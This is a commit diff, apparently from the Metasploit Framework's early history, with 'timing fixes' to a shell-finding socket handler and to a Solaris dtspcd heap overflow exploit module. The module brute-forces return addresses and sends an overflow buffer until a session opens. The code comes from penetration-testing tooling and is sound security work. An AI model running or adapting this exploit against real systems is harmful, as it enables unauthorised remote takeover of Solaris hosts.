timing fixes

git-svn-id: file:///home/svn/incoming/trunk@3292 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-31 19:49:12 +00:00
parent 2bcfd6f0e5
commit 8de634c25f
2 changed files with 20 additions and 8 deletions

View File

@ -44,10 +44,12 @@ module FindPort
# currently only works for shells.
#
def handler(sock)
return if not sock
_find_prefix(sock)
# Flush the receive buffer
sock.get(1)
sock.get_once(-1, 1)
# If this is a multi-stage payload, then we just need to blindly
# transmit the stage and create the session, hoping that it works.
@ -125,7 +127,7 @@ protected
sock.put("\necho #{ebuf}\n")
# Try to read a response
rbuf = sock.get(3)
rbuf = sock.get_once
# If it contains our string, then we rock
if (rbuf =~ /#{ebuf}/)

View File

@ -62,10 +62,16 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
rbase = target['Rets'][1]
while (rbase < target['Rets'][2]) do
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
rbase += target['Rets'][3]
break if session_created?
begin
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
break if session_created?
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
rbase += target['Rets'][3]
rescue EOFError
end
end
end
@ -113,11 +119,15 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
buf << "X" * ((0x103e - 8) - buf.length)
spc_write(spc_register("", buf), 4)
sock.get_once(-1)
handler
rescue EOFError
rescue => e
$stderr.puts "Error: #{e.to_s} #{e.class.to_s}"
end
end